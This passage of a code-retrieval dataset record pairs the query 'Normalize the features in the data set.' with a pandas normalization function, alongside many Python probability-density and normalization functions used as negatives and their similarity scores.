negative value!\")\n\n if self.is_fit:\n if x >= 0:\n enu = np.power(self.alpha, x) * np.power(np.e, -self.alpha)\n den = np.math.factorial(x)\n return enu / den\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def log_pdf_at_x(x):\n return lambda point: gs.log(\n self.information_manifold.point_to_pdf(point)(x)\n )", "def pdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return mp.zero\n if x == 0 and a < 1:\n return mp.inf\n if x == 1 and b < 1:\n return mp.inf\n return (mp.power(x, a - 1) * mp.power(1 - x, b - 1) /\n mp.beta(a, b))", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = 
True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def pdfInTransformedSpace(self,x):\n if self.method == 'pca':\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfInTransformedSpace = self._distribution.pdfInTransformedSpace(coordinate)\n else:\n self.raiseAnError(NotImplementedError,'ppfTransformedSpace not yet implemented for ' + self.method + ' method')\n return pdfInTransformedSpace", "def pdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.pdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.pdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def _dncb_pdf(x, a1, a2, mu1, mu2):\n out = st.beta.pdf(x, a1, a2, loc=0)\n out *= np.exp(-mu1-mu2)\n out *= hchg(x, a1, a2, mu1, mu2)\n return out", "def pdf(self, x: float) -> float:\n\n return (1.0 / (self.sigma * np.sqrt(2*math.pi))) * \\\n np.exp(-0.5*((x - self.mu) / self.sigma) ** 2)", "def pdf(self, x):\n if type(x) is not np.ndarray:\n raise TypeError(\"x must be a numpy.ndarray\")\n if len(x.shape) != 2:\n str = 'x must have the shape ({}, 1)'.format(d)\n raise ValueError(str)\n d = self.mean.shape[0]\n if x.shape[0] != d or x.shape[1] != 1:\n str = 'x must have the shape ({}, 1)'.format(d)\n raise ValueError(str)\n const = 1 / np.sqrt(((2 * np.pi) ** d) * (np.linalg.det(self.cov)))\n n_dev = -(x - self.mean).T\n ins = np.matmul(n_dev, np.linalg.inv(self.cov))\n half_dev = (x - self.mean) / 2\n out = np.matmul(ins, half_dev)\n exp = np.exp(out)\n pdf = const * exp\n pdf = pdf.reshape(-1)[0]\n return pdf", "def PoissonPDF(v):\n from scipy.special import gamma\n\n a = 3.24174\n b = 3.24269\n c = 1.26861\n g = gamma(a / c)\n k1 = c * b ** (a / c) / g\n pdf = k1 * np.power(v, (a - 1)) * np.exp(- b * np.power(v, c))\n return pdf", "def pdf(sample, location=0, scale=1):\n location = T.cast(location, theano.config.floatX)\n SQRT_2_PI = np.sqrt(2 * PI)\n SQRT_2_PI = T.cast(SQRT_2_PI, theano.config.floatX)\n\n divisor = 2 * scale ** 2 # + epsilon,\n divisor = T.cast(divisor, theano.config.floatX)\n if isinstance(location, T.TensorVariable) and location.ndim == 0:\n location = location.dimshuffle('x')\n\n exp_arg = -((sample - location) ** 2) / divisor\n z = 1. / (SQRT_2_PI * scale + epsilon)\n\n return T.exp(exp_arg) * z", "def pdf(self, xs):\n xs = np.atleast_2d(xs)\n return self.factor * np.exp(-0.5 * np.sum(xs * xs, axis=0))", "def pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def pdf(self, x):\n from scipy.special import beta\n return (2 / beta(self.m / 2.0, self.n / 2.0) * x ** (self.m - 1) *\n (1 - x * x) ** (self.n / 2.0 - 1))", "def pdf_define(param_td):\n parametric_family = param_td['parametric_family']\n true_parameters = param_td['true_parameters']\n\n eval_str = 'scipy.stats.' 
+ str(parametric_family) + \\\n '.pdf' + '(x, ' + str(true_parameters)[1:-1] + ')'\n\n eval_str = eval_str.replace(\"'\", \"\").replace(\":\", \"=\")\n\n return lambda x: eval(eval_str) # define pdf_true", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #return stats.gamma.pdf(obs,a = self.gp_link.transf(gp)/self.variance,scale=self.variance)\r\n alpha = link_f*self.beta\r\n objective = (y**(alpha - 1.) * np.exp(-self.beta*y) * self.beta**alpha)/ special.gamma(alpha)\r\n return np.exp(np.sum(np.log(objective)))", "def dist_pdf(z, loc, scale, a, tail=0, tail_len=0):\n pdf1 = gamma.pdf(z, loc=loc, scale=scale, a=a)\n\n tpeak = loc + (a-1)*scale\n tcut = tail_len + loc + (a-1)*scale\n tstart = gamma.interval(0.999, loc=loc, scale=scale, a=a)[0] #start at 1% of cdf \n pdf2 = np.ones_like(z)\n pdf2[z < tpeak] = (z[z < tpeak] - tstart)/(tpeak - tstart)\n pdf2[z > tpeak] = (tcut - z[z > tpeak])/(tcut - tpeak)\n pdf2[z > tcut] = 0\n pdf2[z < tstart] = 0\n\n pdf = pdf1 + pdf2*tail\n\n pdf[z < 100] = 0\n\n return pdf/np.trapz(pdf, z)", "def pdf(self, x):\r\n return self._coef * reduce(mul, [xx ** (aa-1) for (xx, aa) in zip(x, self._alpha)])", "def pdf(data, args):\n return Plot._dist(data, args)", "def pdf_link(self, link_f, y, extra_data=None):\r\n #Assumes no covariance, exp, sum, log for numerical stability\r\n return np.exp(np.sum(np.log(stats.norm.pdf(y, link_f, np.sqrt(self.variance)))))", "def log_pdf_derivative(x):\n return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return np.prod(stats.poisson.pmf(y,link_f))", "def n_pdf(x):\n return 1/np.sqrt(2*np.pi)*np.exp(-x**2/2)", "def processedPdf(self, grid, dataSegment):\n # if self.multipyLikelihoods == True, multi-dimensional data is processed one dimension at a time;\n # likelihoods are then multiplied\n if len(dataSegment.shape) == 2 and self.multiplyLikelihoods:\n return np.prod(np.array([self.processedPdf(grid, d) for d in dataSegment.T]), axis=0)\n\n # check for missing data\n if np.isnan(dataSegment).any():\n return np.ones_like(grid[0]) # grid of ones does not alter the current prior distribution\n\n return self.pdf(grid, dataSegment)", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n #Careful gamma(big_number) is infinity!\r\n objective = ((np.exp(gammaln((self.v + 1)*0.5) - gammaln(self.v * 0.5))\r\n / (np.sqrt(self.v * np.pi * self.sigma2)))\r\n * ((1 + (1./float(self.v))*((e**2)/float(self.sigma2)))**(-0.5*(self.v + 1)))\r\n )\r\n return np.prod(objective)", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def pdf(s, x):\r\n x = Basic.sympify(x)\r\n return 1/(s.sigma*sqrt(2*pi)) * exp(-(x-s.mu)**2 / (2*s.sigma**2))", "def calculate_prp(self, ref_point: np.ndarray, f_current: np.ndarray) -> np.ndarray:\n\n # distance\n d = np.linalg.norm(np.atleast_2d(ref_point - f_current))\n\n # unit vectors\n ei = np.array([np.zeros(len(ref_point))])\n es = np.repeat(ei, len(ref_point), axis=0)\n\n for i, j in enumerate(es):\n for ind, _ in enumerate(j):\n if ind == i:\n j[ind] = 1\n\n return ref_point + (d * es)", "def pdf(self, x, mu, 
**kwargs):\n xrange = self._xrange_nonzero_(mu)\n \n if is_arraylike(x):\n x = np.asarray(x) \n Poisson_continuous = np.zeros(len(x)) \n flag_measure_it = (x>=xrange[0]) & (x<xrange[1])\n Poisson_continuous[flag_measure_it] = np.exp(-x[flag_measure_it]) if mu<=0.25 else \\\n mu**x[flag_measure_it] * np.exp(-mu) / special.gamma(1+x[flag_measure_it])\n return Poisson_continuous \n\n return 0 if (x>=xrange[0]) or (x<xrange[1]) else np.exp(-x) if mu<=0.25 else \\\n mu**x * np.exp(-mu) / special.gamma(1+x)", "def pdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized posterior not implemented\")", "def pdf(x, mu, std):\n if std == 0:\n return 0\n return (1.0 / (std * sqrt(2 * pi))) * np.exp(-(x - mu) ** 2 / (2 * std ** 2))", "def define_pdf(self, values: torch.Tensor, weights: torch.Tensor, inds: torch.Tensor) -> Distribution:\n\n raise NotImplementedError()", "def pdf(s, x):\r\n x = Basic.sympify(x)\r\n if not isinstance(x, Number):\r\n raise NotImplementedError(\"SymPy does not yet support\"\r\n \"piecewise functions\")\r\n if x < s.a or x > s.b:\r\n return Rational(0)\r\n return 1/(s.b-s.a)", "def pdf(self, K):\n return derivative(partial(self.option_price, payoff='Call'), K, dx=ONE_BP/10,\n n=2,\n order=3)", "def __call__(self, x, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n p = np.atleast_2d(np.zeros_like(x))\n a, b = self.get_args(x[...,0])\n p[...,1] = self.distribution.pdf(x[...,1], a, b, loc=self.loc(x[...,0]), scale=self.scale(x[...,0]))\n with np.errstate(invalid='ignore'):\n p[...,1] = np.log(p[...,1])\n return p", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def pdf_from_cdf(data, idx, what):\n\n cdf = data[what + '_sum'].cumsum() / data[what + '_sum'].sum()\n cdfi = scipy.interpolate.interp1d(cdf.index, cdf, 'linear', bounds_error=False)(idx)\n pdfi = np.hstack((cdfi[0], np.diff(cdfi) / np.diff(idx)))\n return pdfi", "def pdf(self, x):\n x = self.lib.atleast_2d(x)\n es = x[:, None, :] - self.means[None, :, :]\n\n # The code below does: exp[i] = es[i].T @ self.inverse_covariances_device[i] @ es[i]\n exp = es[:, :, None, :] @ self._inverse_covariances[None, :, :, :] @ es[:, :, :, None]\n r = self.lib.exp(-0.5*exp).squeeze()\n\n # The code below does: result = sum(r[i] * self.weights_device[i] * self.constants_device[i])\n result = numpy.sum(self.lib.atleast_2d(self._constants * self.weights * r), axis=1)\n\n return result", "def proof_pdf(self):\n return self._proof_pdf", "def pdf(self, x):\r\n if type(x) is not np.ndarray:\r\n raise TypeError(\"x must be a numpy.ndarray\")\r\n if ((len(x.shape) != 2 or x.shape[1] != 1\r\n or x.shape[0] != self.mean.shape[0])):\r\n raise ValueError(\"x must have the shape ({}, 1)\"\r\n .format(self.mean.shape[0]))\r\n res = np.matmul((x - self.mean).T, np.linalg.inv(self.cov))\r\n res = np.exp(np.matmul(res, (x - self.mean)) / -2)\r\n res /= np.sqrt(pow(2 * np.pi, x.shape[0]) * np.linalg.det(self.cov))\r\n return res[0][0]", "def get_pdf(self, size=1e6):\n # Separate parts of parameters\n arg = self.best_params[:-2]\n loc = self.best_params[-2]\n scale = self.best_params[-1]\n\n # Get sane start and end points of distribution\n start = self.best_distribution.ppf(0.01, *arg, loc=loc, scale=scale) if arg else self.best_distribution.ppf(0.01, loc=loc, 
scale=scale)\n end = self.best_distribution.ppf(0.99, *arg, loc=loc, scale=scale) if arg else self.best_distribution.ppf(0.99, loc=loc, scale=scale)\n\n # Build PDF and turn into pandas Series\n x = np.linspace(start, end, size)\n y = self.best_distribution.pdf(x, loc=loc, scale=scale, *arg)\n pdf = pd.Series(y, x)\n\n return pdf", "def getPDFValue(self, value):\n pdfValue = self.pdfSample.get(value, None)\n if pdfValue != None:\n return pdfValue\n \n pdfValue = self.__pdfFunction(value)\n self.pdfSample[value] = pdfValue\n return pdfValue", "def pdf(cls, params, xs=None):\n n = params['negative']\n if xs is None:\n # Find nice range to graph\n lower = ((-1 if n else 1) *\n params['loc'] / (np.exp(params['scale']) **\n cls.standard_deviations_in_default_range))[0, 0]\n upper = ((-1 if n else 1) *\n params['loc'] * (np.exp(params['scale']) **\n cls.standard_deviations_in_default_range))[0, 0]\n if n:\n lower, upper = upper, lower\n\n xs = np.linspace(\n (lower if np.isnan(params['minimum']) else params['minimum']).ravel(),\n (upper if np.isnan(params['maximum']) else params['maximum']).ravel(),\n cls.default_number_points_in_pdf\n ).ravel()\n\n ys = stats.lognorm.pdf(\n -1 * xs if n else xs,\n params['scale'],\n scale=np.exp(params['loc'])\n )\n return xs, ys.ravel()", "def pdf(self, x, mean, cov):\r\n dim, mean, cov = _process_parameters(None, mean, cov)\r\n x = _process_quantiles(x, dim)\r\n prec_U, log_det_cov = _psd_pinv_decomposed_log_pdet(cov)\r\n out = np.exp(self._logpdf(x, mean, prec_U, log_det_cov))\r\n return _squeeze_output(out)", "def contrast_pdf(contdc, contdc_sigma, dc_tru, dc_sigma, contrast_axis, npts=8000, display=False):\n\n dc_axis = np.linspace(dc_tru - 8 * dc_sigma, dc_tru + 8 * dc_sigma, npts)\n dc_mesh, contrast_mesh = np.meshgrid(dc_axis, contrast_axis)\n contdc_mesh = dc_mesh * contrast_mesh\n\n pdf_contdc = scipy.stats.rice.pdf(contdc_mesh, contdc / contdc_sigma, scale=contdc_sigma, loc=0.)\n pdf_dc, _ = norm_pdf(dc_tru, dc_sigma, x=dc_mesh)\n joint_pdf = pdf_contdc * pdf_dc\n\n # normalise joint PDF\n area = np.trapz(np.trapz(joint_pdf, contdc_mesh, axis=0), dc_axis)\n joint_pdf /= area\n\n # calculate the ratio pdf\n integrand = abs(dc_mesh) * joint_pdf\n contrast_pdf = np.trapz(integrand, dc_mesh, axis=1)\n\n if display:\n plt.figure()\n plt.imshow(pdf_contdc)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(pdf_dc)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(joint_pdf)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(integrand)\n plt.colorbar()\n\n plt.figure()\n plt.plot(contrast_axis, contrast_pdf)\n\n plt.show()\n\n return contrast_pdf", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def make_joint_pdf(self, benchmark) :\n \n #distortion case 1 -- taxes/subsidy uncorrelated with firm size or benchmark case where no tax/subsidy at all\n if self.distortion_case == 1 or benchmark == 1 : \n self.joint_pdf = self.prod_pdf_matrix * self.policy_pdf \n \n #distortion case 2 -- tax/subsidy negatively correlated with firm size, subsidize only fraction self.subsidy_frac of lowest prod plants\n if self.distortion_case == 2:\n \n self.joint_pdf = np.zeros((self.Ns,self.ntau))\n prod_cdf = np.cumsum(self.prod_pdf) # cdf over the idiosyncratic draws of s\n I=np.where(prod_cdf <= self.subsidy_frac)\n self.joint_pdf[I,0]=self.prod_pdf[I] #take the lower part of the pdf over idiosyncratic draws of s\n \n #if there is excempt firms\n if self.excempt_frac>0:\n #take the indices of pdf 
for s for the interval sub and sub+nosub. \n I=np.where((prod_cdf > self.subsidy_frac) & (prod_cdf <= self.subsidy_frac + self.excempt_frac))\n self.joint_pdf[I,1] = self.prod_pdf[I]\n \n J=np.where(prod_cdf > self.excempt_frac + self.subsidy_frac)\n self.joint_pdf[J,2]=self.prod_pdf[J]\n \n \n #distortion case 3 -- tax/subsidy positively correlated with firm size, subsidize only fraction self.subsidy_frac of highest prod plants\n elif self.distortion_case == 3:\n \n self.joint_pdf = np.zeros((self.Ns,self.ntau))\n prod_cdf = np.cumsum(self.prod_pdf) # cdf over the idiosyncratic draws of s\n I=np.where(prod_cdf <= 1-self.subsidy_frac - self.excempt_frac)\n self.joint_pdf[I,2]=self.prod_pdf[I] #take the lower part of the pdf over idiosyncratic draws of s to tax\n \n #if there is excempt firms\n if self.excempt_frac>0:\n #take the indices of pdf for s for the interval sub and sub+nosub. \n I = np.where((prod_cdf > 1 - self.subsidy_frac - self.excempt_frac) & (prod_cdf <= 1 - self.subsidy_frac))\n self.joint_pdf [I,1] = self.prod_pdf[I]\n \n J=np.where(prod_cdf > 1 - self.subsidy_frac)\n self.joint_pdf[J,0] = self.prod_pdf[J]", "def generate_pdf():\n uu_id = uuid.uuid4().hex\n current_app.logger.debug(uu_id)\n current_app.logger.debug(request.form)\n tmp_pdf_filename = \"{}_tmp.pdf\".format(uu_id)\n pdf_filename = \"{}.pdf\".format(uu_id)\n tmp_out_pdf_path = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], tmp_pdf_filename\n )\n out_pdf_path = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], pdf_filename\n )\n fill_template_from_input(\n request.form,\n current_app.config[\"PDF_TEMPLATE_PATH\"],\n tmp_out_pdf_path,\n INPUT_FORM_MAP\n )\n fdf_tmp = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], 'tmp.fdf'\n )\n os.system('pdftk ' + tmp_out_pdf_path + ' generate_fdf output ' + fdf_tmp)\n os.system(\n 'pdftk ' + tmp_out_pdf_path + ' fill_form ' + fdf_tmp +\n ' output ' + out_pdf_path + ' flatten'\n )\n os.remove(tmp_out_pdf_path)\n return pdf_filename", "def pdf(self,x,mu,sigma=None,theta=None,alpha=None):\n\t\n\t\tr,p = self.convertParameters(mu,sigma,theta,alpha)\n\t\treturn self.pdfPR(x,p,r)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def pdf(self, data=None):\n ndim = self.lam.size\n if data is None:\n raise ValueError('No data given!')\n self.data = np.atleast_2d(data)\n # (T, k) array\n diff = self.data - self.const_mu()\n # (k, T) array\n diff_norm = scl.solve(self.const_sigma(), diff.T)\n # (T, ) array\n diff_sandwich = (diff.T * diff_norm).sum(0)\n term1 = ((np.pi * self.eta) ** ndim\n * scl.det(self.const_sigma())) **(-.5)\n term2 = np.exp(gammaln((self.eta + self.ndim) / 2)\n - gammaln(self.eta / 2))\n term3 = (1 + diff_sandwich / self.eta) ** (- (self.eta + ndim) / 2)\n return term1 * term2 * term3", "def first_min_pdf(pdf):\n\t# to be continued in the future if necessary for exact accuracy\n\treturn None", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return 
logsumexp(parts)", "def dirichlet_pdf(x, alpha):\n density = reduce(operator.mul, \n [x[i]**(alpha[i]-1.0) for i in range(len(alpha))])\n norm_top = gamma(np.sum(alpha))\n norm_bot = reduce(operator.mul, [gamma(a) for a in alpha])\n return (norm_top / norm_bot) * density", "def is_pdf(prediction):\n probs = [y for x, y in prediction.items()]\n\n distance = 1 - sum(probs) \n assert distance >= -0.001 \n if distance >= -0.001 and distance < 1:\n return True", "def pdf(self):\n\n pdf = PDF(self.valuesArray)\n return pdf.axes[0], pdf.pdf", "def counting_pdf(x, y, u, b, tau=1, log=False):\n if log:\n return (poisson_pdf(x, u+b, log=True))+(poisson_pdf(y, tau*b, log=True))\n return poisson_pdf(x, u+b)*poisson_pdf(y, tau*b)", "def logpdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.logpdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.logpdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def student(x, y, nu, params):\n\n numer = special.gamma((nu + 2.) / 2.)\n denom = special.gamma(nu / 2.) * nu * np.pi * (params[2]**2)\n\n C = numer / denom\n\n ex = ((x - params[0])**2) / params[2]**2\n ey = ((y - params[1])**2) / params[2]**2\n mix = ex + ey\n body = (1. + (1./nu) * mix) ** (-1. * (nu + 2.)/2.)\n\n pdf = C * body\n\n return pdf", "def dt(x, df=1, loc=0, scale=1, ncp=None, log=False):\n # ==========================================================================\n if log:\n return t.logpdf(x, df=df, loc=0, scale=1)\n else:\n return t.pdf(x, df=df, loc=0, scale=1)", "def target_pdf(p, disttype):\n me, cov = target_params(disttype)\n if disttype == 'round' or disttype == 'correlated':\n prob = multivariate_normal.pdf(p, mean=me, cov=cov)\n elif disttype == 'bimodal' or disttype == 'close_bimodal':\n prob0 = multivariate_normal.pdf(p, mean=me[0], cov=cov)\n prob1 = multivariate_normal.pdf(p, mean=me[1], cov=cov)\n prob = max([prob0, prob1]) \n \n return prob", "def dlogpdf_df(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n dlogpdf_dlink = self.dlogpdf_dlink(link_f, y, extra_data=extra_data)\r\n dlink_df = self.gp_link.dtransf_df(f)\r\n return chain_1(dlogpdf_dlink, dlink_df)" ]
[ "0.7687768", "0.74538267", "0.74296933", "0.73647636", "0.7215672", "0.71905404", "0.7085889", "0.70647675", "0.70454675", "0.69965947", "0.69869745", "0.69869745", "0.697386", "0.6928952", "0.6928614", "0.69227785", "0.69120353", "0.684598", "0.68387115", "0.6809058", "0.67874706", "0.6771798", "0.67444533", "0.6691996", "0.6675699", "0.66396797", "0.6585872", "0.65762913", "0.6573601", "0.6566741", "0.6531283", "0.65311116", "0.6469278", "0.64389235", "0.64297026", "0.6427634", "0.64106846", "0.63933426", "0.6349968", "0.63415104", "0.6321465", "0.631499", "0.6298606", "0.62846583", "0.6282403", "0.62630165", "0.6260559", "0.6256774", "0.62335587", "0.62116724", "0.6211407", "0.621105", "0.62103486", "0.62093467", "0.62031984", "0.6199399", "0.619845", "0.619568", "0.6179112", "0.61697483", "0.61658317", "0.6160165", "0.6160165", "0.6157524", "0.6147445", "0.61277574", "0.6117766", "0.6108891", "0.60878426", "0.60832435", "0.60715675", "0.60365534", "0.6018812", "0.60017806", "0.5962629", "0.595417", "0.59522206", "0.5948527", "0.59162486", "0.5909149", "0.5891488", "0.589002", "0.58833516", "0.5883257", "0.58788425", "0.5875128", "0.58631617", "0.5832027", "0.58288854", "0.5824175", "0.58158", "0.5813303", "0.580978", "0.5800487", "0.5776561", "0.5765124", "0.5764594", "0.5758521", "0.5758104", "0.5755355" ]
0.73273325
4
Normalize the features in the data set.
def normalize_features(df):
    mu = df.mean()
    sigma = df.std()

    if (sigma == 0).any():
        raise Exception("One or more features had the same value for all samples, and thus could " + \
                        "not be normalized. Please do not include features with only a single value " + \
                        "in your model.")

    df_normalized = (df - df.mean()) / df.std()

    return df_normalized, mu, sigma
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def normalizeFeatureVector(self):\n # Normalize features\n total = 0.0\n for v in self.features.values(): total += abs(v)\n if total == 0.0: \n total = 1.0\n for k,v in self.features.iteritems():\n self.features[k] = float(v) / total", "def _normalize(self, dataset):\n if self.max is None: # if we are normalizing the training set\n self.max, self.min = dataset.max(), dataset.min() # find max, min value for each columns\n for row in dataset.index: # for each row in dataset\n for col in self.features: # for each feature in the instance (exclude target)\n dataset.at[row, col] = (dataset.at[row, col] - self.min[col]) / (self.max[col] - self.min[col]) if col != \"Bias\" else 1", "def normalize_data(self):\n self.x_mean, self.x_std = du.get_mean_std(self.x_train)\n self.x_train = du.normalize(self.x_train, self.x_mean, self.x_std)\n if self.x_test is not None and self.y_test is not None:\n self.x_test = du.normalize(self.x_test, self.x_mean, self.x_std)\n self.normalized_data = True", "def _normalize_feature(self, feature):\n\n for ic in range(self.data_shape[0]):\n feature[ic] = (feature[ic] - self.feature_mean[ic]\n ) / self.feature_std[ic]\n return feature", "def normalize_features(self, data_dict, ind):\n pre_norm_list = []\n for title in data_dict:\n pre_norm_list.append(data_dict[title][ind])\n if self.normalization_method == 'min_max':\n mini, maxi, norm_list = normalize.min_max_normalize(pre_norm_list)\n self.normalization_n.append(mini)\n self.normalization_d.append(maxi - mini)\n elif self.normalization_method == 'z_score':\n mean, var, norm_list = normalize.z_score_normalize(pre_norm_list)\n self.normalization_n.append(mean)\n self.normalization_d.append(var)\n elif self.normalization_method == 'none':\n norm_list = pre_norm_list[:]\n self.normalization_n.append(0)\n self.normalization_d.append(1)\n for i, title in enumerate(data_dict):\n data_dict[title][ind] = norm_list[i]", "def feature_normalize(X):\n X_mean = np.mean(X, axis=0)\n X_std = np.std(X, axis=0)\n X_std[0, 0] = 1\n X_normalize = (X - X_mean) / X_std\n X_normalize[:, 0] = 1.0\n return X_normalize, X_mean, X_std", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize_features(X):\n std = X.std(axis=0)\n std = np.where(std == 0, 1, std) # to avoid division by zero\n x_normed = (X - X.mean(axis=0)) / std\n return x_normed", "def normalize_features(dataframe):\n print(\"Normalizing feature matrix...\")\n tmp = dataframe\n feats = tmp.drop(columns=['year', 'county'])\n fmax = feats.max()\n fmin = feats.min() \n # normalize the feature matrix\n feats = (feats - fmin) / (fmax - fmin)\n tmp[feats.columns] = feats\n\n return tmp", "def normalize_data(self, df):\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.train_df[feature_name].max()\n min_value = self.train_df[feature_name].min()\n result[feature_name] = (\n df[feature_name] - min_value) / (max_value - min_value)\n return result", "def normalize_feature_data(feature, X_train, X_valid, X_test):\r\n if type(feature) == list:\r\n for i, f in enumerate(feature):\r\n \r\n if f in __normalizing_features__:\r\n stds = np.std(X_train[i], axis=0)\r\n stds[stds==0.0] = 1.0\r\n means = np.mean(X_train[i], axis=0)\r\n X_train[i] = (X_train[i]-means)/stds\r\n X_valid[i] = (X_valid[i]-means)/stds\r\n X_test[i] = (X_test[i]-means)/stds\r\n else:\r\n if feature in __normalizing_features__:\r\n stds = np.std(X_train, 
axis=0)\r\n stds[stds==0.0] = 1.0\r\n means = np.mean(X_train, axis=0)\r\n X_train = (X_train-means)/stds\r\n X_valid = (X_valid-means)/stds\r\n X_test = (X_test-means)/stds\r\n \r\n return X_train, X_valid, X_test", "def _localNormalizeData(self,values,names,feat):\n self.muAndSigmaFeatures[feat] = (0.0,1.0)", "def featureNormalize(X):\n\n mu = np.mean(X, axis=0)\n sigma = np.std(X, axis=0)\n\n X_normalized = (X - mu) / sigma\n\n return X_normalized, mu, sigma", "def normalize(self):\n self._data /= self.norm()", "def feature_normalization(train, test):\n (N,p) = np.shape(train)\n mins = np.amin(train,axis=0)\n maxs = np.amax(train,axis=0) + mins\n train = (train + mins)/maxs\n test = (test + mins)/maxs\n return train, test", "def feature_normalization(train, test):\n mins_of_features = np.amin(train, axis=0)\n maxs_of_features = np.amax(train, axis=0)\n range_of_features = maxs_of_features-mins_of_features\n range_of_features[range_of_features==0] = 1\n \n train_normalized = (train - mins_of_features)/range_of_features\n test_normalized = (test - mins_of_features)/range_of_features\n \n return (train_normalized, test_normalized)", "def normalize_features(df):\n mu = df.mean()\n sigma = df.std()\n\n if (sigma == 0).any():\n raise Exception(\"One or more features had the same value for all samples, and thus could \" +\n \"not be normalized. Please do not include features with only a single value \" +\n \"in your model.\")\n df_normalized = (df - df.mean()) / df.std()\n\n return df_normalized, mu, sigma", "def featureNormalize(X):\n X_norm, mu, sigma = X,0,0\n # ====================== YOUR CODE HERE ======================\n # Instructions: First, for each feature dimension, compute the mean\n # of the feature and subtract it from the dataset,\n # storing the mean value in mu. Next, compute the\n # standard deviation of each feature and divide\n # each feature by it's standard deviation, storing\n # the standard deviation in sigma.\n #\n # Note that X is a matrix where each column is a\n # feature and each row is an example. 
You need\n # to perform the normalization separately for\n # each feature.\n #\n # Hint: You might find the 'mean' and 'std' functions useful.\n #\n \n # get the number of features in X and norm 1 col at a time \n \n for i in range(X.shape[1]):\n mu_i = np.mean(X[:,i]) #calculate mean for each col\n sigma_i = np.std(X[:,i]) #calculate sigma for each col\n X_norm[:,i] = ((X_norm[:,i] - mu_i) / sigma_i) #norm data in col\n \n # want to make an array of all values of mu and sigma\n if i == 0: \n mu = mu_i\n sigma = sigma_i\n else:\n mu = np.append(mu,mu_i)\n sigma = np.append(sigma,sigma_i)\n # ============================================================\n \n return X_norm, mu, sigma", "def normalize_dataset(self):", "def featureNormalization(X):\n mean=np.hstack(np.mean(X[:,0]),np.mean(X[:,1]),np.mean(X[:,2]))\n std=np.hstack(np.std(X[:,0]),np.std(X[:,1]),np.std(X[:,2]))\n \n X_norm = (X - mean)/std\n \n return X_norm", "def feature_normalization(train, test):\n # TODO\n col_max = np.apply_along_axis(max, 0, train)\n col_min = np.apply_along_axis(min, 0, train)\n\n train_normalized = (train-col_min)/(col_max-col_min)\n test_normalized = (test-col_min)/(col_max-col_min)\n \n return train_normalized, test_normalized", "def normalize(dataset):\n return normalize_standard_deviation(normalize_mean(dataset))", "def normalize_feature(df):\n return df.apply(lambda column: (column - column.mean()) / column.std())", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def normalize(self, X):\n return X - X.mean()", "def normalize_features(array):\n \n array_normalized = (array-array.mean())/array.std()\n 